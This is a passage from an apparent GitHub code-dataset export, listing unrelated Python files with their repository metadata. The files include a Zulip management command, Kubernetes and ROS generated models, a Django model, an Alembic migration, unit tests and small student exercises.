parser.add_argument('url_format_string', metavar='<url pattern>', type=str, nargs='?',
help="format string to substitute")
def handle(self, *args, **options):
realm = get_realm(options["domain"])
if options["op"] == "show":
print("%s: %s" % (realm.domain, all_realm_filters().get(realm.domain, [])))
sys.exit(0)
pattern = options['pattern']
if not pattern:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
if options["op"] == "add":
url_format_string = options['url_format_string']
if not url_format_string:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
do_add_realm_filter(realm, pattern, url_format_string)
sys.exit(0)
elif options["op"] == "remove":
do_remove_realm_filter(realm, pattern)
sys.exit(0)
else:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
| [
"[email protected]"
]
| |
0bed982517ec2d1db37c3a013aeab72f14937675 | e832ec980dfb5cb52fb3116ca1ac79052cb02fae | /guo_py1811code/first/day_0325/code/requests_07_https.py | d38a5e8c6e7d7af4f5e858619f1ace95123202f2 | []
| no_license | Liu-Zhijuan-0313/Spider | e6b10ebd5f9b5c70803494e1b894ac4556dfc544 | bf04e9615e23350f7c0b9321ac3b7cbd4450dd3e | refs/heads/master | 2020-05-03T18:36:12.102519 | 2019-04-19T02:48:13 | 2019-04-19T02:48:13 | 178,766,396 | 0 | 0 | null | 2019-04-18T07:11:23 | 2019-04-01T01:50:37 | HTML | UTF-8 | Python | false | false | 106 | py | import requests
response = requests.get('https://kennethreitz.com', verify=True)
print(response.text)
| [
"[email protected]"
]
| |
94709ea9fdd3f5b965a753f366702dbec38c259a | c0c6b41523d8f8071c88d4320d9040a6d1d2e3f4 | /problem1 | 80d2761714d5ce30c6ac12310c7fc42a98b8b028 | []
| no_license | GLAU-TND/python-programming-assignment-2-Manish-021 | 952cf9bd8a4f953074595f7c7d164541eba94443 | 782bdef864fadac653e500d03498de6c92c56382 | refs/heads/master | 2021-01-09T11:43:22.749103 | 2020-02-24T11:42:25 | 2020-02-24T11:42:25 | 242,287,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | t=eval(input())
b=[min(t)]
a=min(t)[-1]
t.remove(min(t))
for i in t:
for j in t:
if a==j[0] and j[-1]!=b[0][0]:
b.append(j)
a=j[-1]
t.remove(j)
break
b=b+t
print(b)
| [
"[email protected]"
]
| ||
81008224cac8591b4f00dcd38bf9b8e5cc34dc27 | 30ec40dd6a81dbee73e7f14c144e20495960e565 | /kubernetes/client/models/v1beta1_http_ingress_rule_value.py | 9653f80f26ca995284fb6ca79ec30368e71cd13e | [
"Apache-2.0"
]
| permissive | jonathan-kosgei/client-python | ae5a46968bcee19a3c62e1cefe227131ac9e7200 | 4729e6865d810824cafa312b4d06dfdb2d4cdb54 | refs/heads/master | 2021-01-20T14:59:10.435626 | 2017-05-08T16:55:51 | 2017-05-08T16:55:51 | 90,700,132 | 1 | 0 | null | 2017-05-09T03:50:42 | 2017-05-09T03:50:42 | null | UTF-8 | Python | false | false | 3,300 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1HTTPIngressRuleValue(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, paths=None):
"""
V1beta1HTTPIngressRuleValue - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'paths': 'list[V1beta1HTTPIngressPath]'
}
self.attribute_map = {
'paths': 'paths'
}
self._paths = paths
@property
def paths(self):
"""
Gets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:return: The paths of this V1beta1HTTPIngressRuleValue.
:rtype: list[V1beta1HTTPIngressPath]
"""
return self._paths
@paths.setter
def paths(self, paths):
"""
Sets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:param paths: The paths of this V1beta1HTTPIngressRuleValue.
:type: list[V1beta1HTTPIngressPath]
"""
if paths is None:
raise ValueError("Invalid value for `paths`, must not be `None`")
self._paths = paths
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1HTTPIngressRuleValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
]
| |
a098dbcf2862c4b934dc7a374423ead058106d1c | 1e84a9fec36deaf9a55a2734749ea035f72ac869 | /KAKAO BLIND RECRUITMENT/2017/1차/다트 게임/refernece_code.py | f0d49073d4794a7333d54379d6f483324e86a55c | []
| no_license | mgh3326/programmers_algorithm | aa3afc91231550e1fec2d72d90e85b140f79d677 | b62f08ccccbdcac71e484d508985a5a9ce5f2434 | refs/heads/master | 2022-08-31T04:19:15.728666 | 2022-07-31T14:02:26 | 2022-07-31T14:02:26 | 201,747,526 | 0 | 0 | null | 2022-07-23T10:19:13 | 2019-08-11T10:02:15 | Python | UTF-8 | Python | false | false | 601 | py | def solution(dartResult):
point = []
answer = []
dartResult = dartResult.replace('10','k')
point = ['10' if i == 'k' else i for i in dartResult]
print(point)
i = -1
sdt = ['S', 'D', 'T']
for j in point:
if j in sdt :
answer[i] = answer[i] ** (sdt.index(j)+1)
elif j == '*':
answer[i] = answer[i] * 2
if i != 0 :
answer[i - 1] = answer[i - 1] * 2
elif j == '#':
answer[i] = answer[i] * (-1)
else:
answer.append(int(j))
i += 1
return sum(answer)
| [
"[email protected]"
]
| |
34c75ed85b11695edf53feaa3236244bd3fefc44 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-sblp-obt/sblp_ut=3.5_rd=1_rw=0.06_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=4/params.py | f2962918ddc7d0f6fada37b1a1592dedf23cce8d | []
| no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | {'cpus': 4,
'duration': 30,
'final_util': '3.668690',
'max_util': '3.5',
'periods': 'harmonic-2',
'release_master': False,
'res_distr': '1',
'res_nmb': '4',
'res_weight': '0.06',
'scheduler': 'RUN',
'trial': 4,
'utils': 'uni-medium-3'}
| [
"[email protected]"
]
| |
5fc066834916a8dbb349035d834ab8ffcd3415d5 | c3483984a4782be6097e4753de3cb545ae00039b | /geneticTest/unitTestingExample/unitTesting/test_Employee.py | e00ef30b7b7dd17f737f32a405b4966559a25522 | []
| no_license | nghiemphan93/machineLearning | 67c3f60f317a0c753b465751113511baaefd1184 | 36d214b27c68d399f5494b5ec9b28fee74d57f7f | refs/heads/master | 2020-03-28T02:20:11.843154 | 2020-02-03T14:18:39 | 2020-02-03T14:18:39 | 147,563,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,536 | py | import unittest
from geneticTest.unitTestingExample.stuffToTest.Employee import Employee
class TestEmployee(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('setupClass')
@classmethod
def tearDownClass(cls):
print('teardownClass')
def setUp(self):
print('setUp')
self.emp_1 = Employee('Corey', 'Schafer', 50000)
self.emp_2 = Employee('Sue', 'Smith', 60000)
def tearDown(self):
print('tearDown\n')
def test_email(self):
print('test_email')
self.assertEqual(self.emp_1.email, '[email protected]')
self.assertEqual(self.emp_2.email, '[email protected]')
self.emp_1.first = 'John'
self.emp_2.first = 'Jane'
self.assertEqual(self.emp_1.email, '[email protected]')
self.assertEqual(self.emp_2.email, '[email protected]')
def test_fullname(self):
print('test_fullname')
self.assertEqual(self.emp_1.fullname, 'Corey Schafer')
self.assertEqual(self.emp_2.fullname, 'Sue Smith')
self.emp_1.first = 'John'
self.emp_2.first = 'Jane'
self.assertEqual(self.emp_1.fullname, 'John Schafer')
self.assertEqual(self.emp_2.fullname, 'Jane Smith')
def test_apply_raise(self):
print('test_apply_raise')
self.emp_1.apply_raise()
self.emp_2.apply_raise()
self.assertEqual(self.emp_1.pay, 52500)
self.assertEqual(self.emp_2.pay, 63000)
if __name__ == '__main__':
unittest.main() | [
"[email protected]"
]
| |
56e2ea0cf73544e8dbe4bf9a62cade699f0cd4f7 | 353e6685be6737a828b8770d4d71e389ca2853b9 | /0x11-python-network_1/5-hbtn_header.py | b7a195a4f570bbc400e36cfd7ab5c6a16a190e72 | []
| no_license | adebudev/holbertonschool-higher_level_programming | 912af3f7caab3197beb062b5389f5b464b2ed177 | cb0510ed0b6d7b7c43d0fd6949139b62e2bdede7 | refs/heads/master | 2022-12-18T17:40:28.539558 | 2020-09-25T04:29:45 | 2020-09-25T04:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | #!/usr/bin/python3
"""Request value X-Request-Id with requests Module"""
import requests
import sys
if __name__ == '__main__':
"""displays the value of the variable X-Request-Id"""
url = sys.argv[1]
R = 'X-Request-Id'
req = requests.get(url)
print(req.headers.get(R))
| [
"[email protected]"
]
| |
63d41c42f8f87f62095b5bc99fda6d77e3eb4288 | 59788643fcce655a3a15ad0d3c91401a63e525d9 | /home/models.py | f925cf6580cdcd1ae6f9a202aa595fe40ca9a4ba | []
| no_license | crowdbotics-apps/element-28308 | f39132662eb2e433d44e3c570ae539d9feae3db0 | 018966b7d47c9e2f9b1bb33c018d1a9b7a3b3b42 | refs/heads/master | 2023-06-06T09:31:10.513777 | 2021-06-29T20:33:03 | 2021-06-29T20:33:03 | 381,465,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 276 | py | from django.conf import settings
from django.db import models
class CustomText(models.Model):
"Generated Model"
chart = models.URLField(
null=True,
blank=True,
)
class HomePage(models.Model):
"Generated Model"
body = models.TextField()
| [
"[email protected]"
]
| |
b71cf501c6e9e920c344c180785088347c9eea05 | 398de9098811c7712b18f8e314340ce93aa86839 | /id2date.py | 7fc4502cd5258ae680b5604cba9dd53e78ba1f70 | []
| no_license | NiMaZi/thesis | 0c2ce8bced070d010838bae80f844a46bb1a798c | 15dc1aeca941f8feec4c283cd7436983ba982871 | refs/heads/master | 2020-03-18T13:19:52.711331 | 2018-07-09T12:11:08 | 2018-07-09T12:11:08 | 134,776,324 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,288 | py | import os
import sys
import csv
import json
import boto3
import numpy as np
homedir=os.environ['HOME']
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan
es=Elasticsearch(['localhost:9200'])
s3 = boto3.resource("s3")
mybucket=s3.Bucket("workspace.scitodate.com")
s3key=sys.argv[1]
id2date={}
for i in range(0,15000):
try:
mybucket.download_file("yalun/"+s3key+"/abs"+str(i)+".txt",homedir+"/temp/tmptxt"+s3key+".txt")
except:
continue
f=open(homedir+"/temp/tmptxt"+s3key+".txt",'r',encoding='utf-8')
abstract=f.read().split(",")[0]
f.close()
results=scan(es,
query={
"query": {
"bool": {
"must": [{"match_phrase": {"abstract": abstract}}]
}
}
},
size=1
)
for n,result in enumerate(results):
if n>10:
break
if abstract in result['_source']['abstract']:
try:
id2date[i]=result['_source']['date']
except:
break
f=open(homedir+"/temp/id2date"+s3key+".json",'w')
json.dump(id2date,f)
f.close()
f=open(homedir+"/temp/id2date"+s3key+".json",'rb')
d=f.read()
f.close()
mybucket.put_object(Body=d,Key="yalun/"+s3key+"/id2date.json") | [
"[email protected]"
]
| |
6f781fbb34a0effb575b1359355f0db2026e382d | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5658571765186560_1/Python/dnutsch/problem_d.py | ec9d645f24bcbab7bf09cb17d6dd1abaea92f717 | []
| no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | #!/usr/bin/python
f = open('D-large.in','r');
out = open('D-large.out','w');
T = int(f.readline().strip())
for t in range(T):
X,R,C = [int(x) for x in f.readline().strip().split(' ')]
#print "x {}, r {}, c {}".format(X,R,C)
mx = max(R,C)
mn = min (R,C)
richard_wins = False
if (R*C) % X != 0:
richard_wins = True
if X >=7:
richard_wins = True # can make a donut
elif X > mx:
# maybe win by bisection, assume so
richard_wins = True
elif X == mx:
# maybe can bisect in minor dimension
if X >= 4 and X >= mn + (mn -1):
richard_wins = True
else:
#can't win by bisection, try squaring
if X >= 4 and mn < 2:
richard_wins = True
if X >= 9 and mn < 3:
richard_wins = True
if X >= 16 and mn < 4:
richard_wins = True
max_angle = 1+((X-1) // 2)
if max_angle > mn:
richard_wins = True
line = "Case #{}: {}".format(t+1, "RICHARD" if richard_wins else "GABRIEL")
print line
out.write(line+"\n")
f.close()
out.close()
| [
"[email protected]"
]
| |
b3a796f6f6e1d72469e523177fe6e9c9ac1fb9ff | 94d5ef47d3244950a0308c754e0aa55dca6f2a0e | /migrations/versions/53e2ad0d34e3_added_produce_id_to_breed_table_instead.py | 977835fba4e07675a127bd13b29394f31d921a8f | []
| no_license | MUMT-IT/mis2018 | 9cbc7191cdc1bcd7e0c2de1e0586d8bd7b26002e | 69fabc0b16abfeba44173caa93d4f63fa79033fd | refs/heads/master | 2023-08-31T16:00:51.717449 | 2023-08-31T11:30:13 | 2023-08-31T11:30:13 | 115,810,883 | 5 | 5 | null | 2023-09-14T10:08:35 | 2017-12-30T17:06:00 | HTML | UTF-8 | Python | false | false | 1,288 | py | """added produce_id to breed table instead
Revision ID: 53e2ad0d34e3
Revises: e4f15449eb31
Create Date: 2018-02-03 22:51:38.297350
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '53e2ad0d34e3'
down_revision = 'e4f15449eb31'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('food_produce_breeds', sa.Column('produce_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'food_produce_breeds', 'food_produces', ['produce_id'], ['id'])
op.drop_constraint(u'food_produces_produce_breed_id_fkey', 'food_produces', type_='foreignkey')
op.drop_column('food_produces', 'produce_breed_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('food_produces', sa.Column('produce_breed_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.create_foreign_key(u'food_produces_produce_breed_id_fkey', 'food_produces', 'food_produce_breeds', ['produce_breed_id'], ['id'])
op.drop_constraint(None, 'food_produce_breeds', type_='foreignkey')
op.drop_column('food_produce_breeds', 'produce_id')
# ### end Alembic commands ###
| [
"[email protected]"
]
| |
65b9c52ec1d9f80e900be3aaf4e02cf9ea349b1c | 9775ca99e222ec2cf7aa071b68954ee750f4b58a | /0x09-python-everything_is_object/100-magic_string.py | bc304a2f8dc85450f6f897c63025222c9cd30a42 | []
| no_license | humeinstein/holbertonschool-higher_level_programming | f7363a129cc5e2787207ab898c984b5866cbe7de | 01ba467964d7585ee95b7e0d76e7ae6bbdf61358 | refs/heads/master | 2020-07-22T20:25:21.868028 | 2020-02-13T23:08:49 | 2020-02-13T23:08:49 | 207,317,556 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | #!/usr/bin/python3
def magic_string(new_list=[]):
new_list += ["Holberton"]
return ", ".join(new_list) | [
"[email protected]"
]
| |
3124b674fa821716127a4d34ee60d1afc948da96 | 7000895fad6f4c23084122ef27b3292d5e57df9f | /src/xrd/crypto/Qryptonight.py | 1475f988d07b1c8d0513eab0742c2dab0685602f | [
"MIT"
]
| permissive | jack3343/xrd-core | 1302cefe2a231895a53fcef73e558cdbc1196884 | 48a6d890d62485c627060b017eadf85602268caf | refs/heads/master | 2022-12-15T07:36:16.618507 | 2020-08-27T09:21:36 | 2020-08-27T09:21:36 | 290,652,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | # coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
import threading
from xrd.core import config
from xrd.core.Singleton import Singleton
from xrd.crypto.Qryptonight7 import Qryptonight7
from xrd.crypto.QRandomX import QRandomX
class Qryptonight(object, metaclass=Singleton):
def __init__(self):
self.lock = threading.Lock()
self._qryptonight_7 = Qryptonight7()
self._qrandom_x = QRandomX()
def get_qn(self, block_number):
if block_number < config.dev.hard_fork_heights[0]:
return self._qryptonight_7
else:
return self._qrandom_x
def get_seed_height(self, block_number):
return self._qrandom_x.get_seed_height(block_number)
def hash(self, block_number, seed_height, seed_hash, blob):
with self.lock:
if block_number < config.dev.hard_fork_heights[0]:
return bytes(self._qryptonight_7.hash(blob))
else:
return bytes(self._qrandom_x.hash(block_number, seed_height, seed_hash, blob))
| [
"[email protected]"
]
| |
d3407c1815d554881ce33812bf3dfc89430fe36f | 2521e6427a7668d8cc91eabb368a5cf0eb7310f9 | /Cap18-Extras/09_dimensionar.py | 5872547aa4d77143e41c6c59a3c7fd24ab1da260 | []
| no_license | frclasso/turma3_Python1_2018 | 4a7bc0ba0eb538100400c15fc5c5b3ac1eeb7e50 | 47cd3aaa6828458b7f5164a8bce717bb8dd83a7c | refs/heads/master | 2020-04-06T16:18:00.889198 | 2019-06-10T15:11:32 | 2019-06-10T15:11:32 | 157,614,408 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | #!/usr/bin/env python3
import openpyxl
wb = openpyxl.Workbook()
#print(wb.sheetnames)
sheet = wb.active
sheet['A1'] = 'Tall row'
sheet['B2'] = 'Wide column'
sheet.row_dimensions[1].height = 70
sheet.column_dimensions['B'].widht = 50
wb.save('dimensions.xlsx')
print('Feito...') | [
"[email protected]"
]
| |
aeb1d9e97840a831a2788c0ea0ccb002728935fd | 2b7d422e78c188923158a2a0780a99eca960e746 | /opt/ros/melodic/lib/python2.7/dist-packages/control_msgs/msg/_JointTrajectoryGoal.py | 5daffbc8743dfc8aad30e794c9f3e0535a86a395 | []
| no_license | sroberti/VREP-Sandbox | 4fd6839cd85ac01aa0f2617b5d6e28440451b913 | 44f7d42494654357b6524aefeb79d7e30599c01d | refs/heads/master | 2022-12-24T14:56:10.155484 | 2019-04-18T15:11:54 | 2019-04-18T15:11:54 | 180,481,713 | 0 | 1 | null | 2022-12-14T18:05:19 | 2019-04-10T02:00:14 | C++ | UTF-8 | Python | false | false | 13,159 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from control_msgs/JointTrajectoryGoal.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import trajectory_msgs.msg
import genpy
import std_msgs.msg
class JointTrajectoryGoal(genpy.Message):
_md5sum = "2a0eff76c870e8595636c2a562ca298e"
_type = "control_msgs/JointTrajectoryGoal"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
trajectory_msgs/JointTrajectory trajectory
================================================================================
MSG: trajectory_msgs/JointTrajectory
Header header
string[] joint_names
JointTrajectoryPoint[] points
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: trajectory_msgs/JointTrajectoryPoint
# Each trajectory point specifies either positions[, velocities[, accelerations]]
# or positions[, effort] for the trajectory to be executed.
# All specified values are in the same order as the joint names in JointTrajectory.msg
float64[] positions
float64[] velocities
float64[] accelerations
float64[] effort
duration time_from_start
"""
__slots__ = ['trajectory']
_slot_types = ['trajectory_msgs/JointTrajectory']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
trajectory
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(JointTrajectoryGoal, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.trajectory is None:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
else:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs))
_x = self.trajectory.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.trajectory.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.trajectory.points)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.positions))
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.velocities))
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.accelerations))
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.effort))
_v1 = val1.time_from_start
_x = _v1
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.trajectory is None:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.trajectory.header.frame_id = str[start:end].decode('utf-8')
else:
self.trajectory.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.trajectory.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = struct.unpack(pattern, str[start:end])
_v2 = val1.time_from_start
_x = _v2
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.trajectory.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs))
_x = self.trajectory.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.trajectory.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.trajectory.points)
buff.write(_struct_I.pack(length))
for val1 in self.trajectory.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.positions.tostring())
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.velocities.tostring())
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.accelerations.tostring())
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.effort.tostring())
_v3 = val1.time_from_start
_x = _v3
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.trajectory is None:
self.trajectory = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.trajectory.header.seq, _x.trajectory.header.stamp.secs, _x.trajectory.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.trajectory.header.frame_id = str[start:end].decode('utf-8')
else:
self.trajectory.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.trajectory.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.trajectory.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v4 = val1.time_from_start
_x = _v4
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.trajectory.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.